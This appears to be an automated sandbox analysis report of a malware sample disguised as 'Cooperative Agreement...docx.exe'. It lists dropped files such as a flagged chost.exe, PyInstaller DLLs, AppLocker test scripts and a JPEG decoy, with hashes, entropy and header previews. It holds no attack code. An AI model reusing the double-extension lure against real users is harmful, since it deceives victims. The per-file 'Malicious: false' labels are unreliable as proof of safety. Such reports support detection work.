Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1016584
Entropy (8bit):	6.669319438805479
Encrypted:	false
SSDEEP:	24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
MD5:	0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
SHA1:	4189F4459C54E69C6D3155A82524BDA7549A75A6
SHA-256:	8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
SHA-512:	A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI43362\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	303384
Entropy (8bit):	7.985402489277108
Encrypted:	false
SSDEEP:	6144:RuQ0qZzMWlZe6+dTxmH1wne4P7dK5H4lT3yfd6o0VSi2Erk8BnJ1KZeA:RuQ0wAWlc6+dg1wb7/82UUrk8BnJ15A
MD5:	2730C614D83B6A018005778D32F4FACA
SHA1:	611735E993C3CC73ECCCB03603E329D513D5678A
SHA-256:	BAA76F6FD87D7A79148E32D3AE38F1D1FE5A98804B86E636902559E87B316E48
SHA-512:	9B391A62429CD4C40A34740DDB04FA4D8130F69F970BB94FA815485B9DA788BCA28681EC7D19E493AF7C99A2F3BF92C3B53339EF43AD815032D4991F99CC8C45
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}...%.}..\|.!.}..~. .}..y.+.}..*x...}.6-\|. .}.h.\|.!.}.#.\|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d...`b.f.........." ...(.`....... ......0................................................`.............................................X....................@.........................................................@...........................................UPX0..... ..............................UPX1.....`...0...`..................@....rsrc................d..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_215efbo3.hve.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tim0hqf.5vs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4q4atji5.noa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aybt40rs.5x3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2ebcc5l.2ud.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3dndjci.1vc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bszjg5eg.bvq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4gblezw.5aa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f44bfdop.ykg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fexptr3e.f14.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht3dynrd.dgk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0qcxubk.xcc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iij4xpuc.h4w.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikafvluj.ydo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw3agsjc.2bq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvyjdxke.iqk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qih4j43r.g45.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rugb4ebk.knb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_somnmpot.344.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uq5ombpu.0cc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwkedayb.kjq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5vgzjne.dov.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl40xpjq.smr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysxuxcgc.f4v.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\chost.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8652434
Entropy (8bit):	7.994002792255621
Encrypted:	true
SSDEEP:	196608:8mgqwfI9jUC2gYBYv3vbW4SEAGPFQw6+HlmQEh:c5IH2gYBgDWZwQwhlk
MD5:	78F52BE4313947325B63CDB27B35C6DC
SHA1:	0ED98A727EC8F04C1C61C75F5E18A794217BDCC1
SHA-256:	C9812C059C0165BE0009EAFEB17315256FCF8CA39628EB1646565FF6C4C9FB6C
SHA-512:	8962F32E9FDBC244103521B454DFBADA9259C7754C3CD125C11B582E5B952C3E023CC7E73244A793F1CEE1D871D6459F3DEC55776B50182318BBCB9866EE00CD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...vvLg.........."....)............ ..........@..........................................`.................................................4...x....p..D2...@..8"..J..H$......d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...D2...p...4..................@..@.reloc..d............6..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\scan000373.jpg

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1470x1960, components 3
Category:	dropped
Size (bytes):	51099
Entropy (8bit):	7.670290194327737
Encrypted:	false
SSDEEP:	1536:GoDSCUA0UzmsiIrcggwz62FVRy9p/KklK+/h/C:GoDStWHrB6ooBVl7c
MD5:	08DF323C85C73E9D39756ED2344BC05A
SHA1:	D733C4728E0B0930C3E084843B06AAA9709D96CF
SHA-256:	72A3158EB1B436B4F273309BEB1F85FE3C48AA9686B82D28F43EB32B328E8BA9
SHA-512:	6A2ADFB781A0434A45095ED55D5E0FBD4BA49D900B1198EE96984787D6AE7C229F362FBDE206D9EAF632A78899C908C8E34623066F8AF73CFDC26747E55876EA
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....H.H.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................!......................!1a.A..Q..................................................!.1............?......... .....k>...L.n~.1}...L.NW.7..3....A.b..=.._........v.g........p...GYZ.r.(...cR.(........................(...............a........".....`. `...(...&... .(A0...L.0....P.P.1p...1@L1@A@AO.A@C..PP...0P.P...1p...0........L.........1A.....C.......TP....@@g.u..>....oO.... ..6.... .R......\.....}:z.^....X...,....0WI...F.....Nq...MJ.X.........+..K....r.....2........ . .............."....@AP.P.P.P.T..AP....P.P..............P..(.. ..a.........(............(`.(....( .............(..(....D.(........`. ..4."..i(9{..>....9z. ..........q(1....v..........b....b.z....yx.N..S.^~....Y..g.....9k.Y.yA.F.t.yQ..^VEE.D.. 5...[..@........WMgN...4...A.Mf.kMgM.....hcM..cN.......4.....D.P]

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Reputation:	unknown
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.913045032384303
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	Cooperative Agreement0000800380.docx.exe
File size:	100'864 bytes
MD5:	24ffda8b313b8867568168889eda370f
SHA1:	dbdc131878ae66320104bcd33cc32021df45eb72
SHA256:	759a3f120cd0280ec88cbd5ad614eeffb89d3a0cf65421f6bf7faf787a7dc282
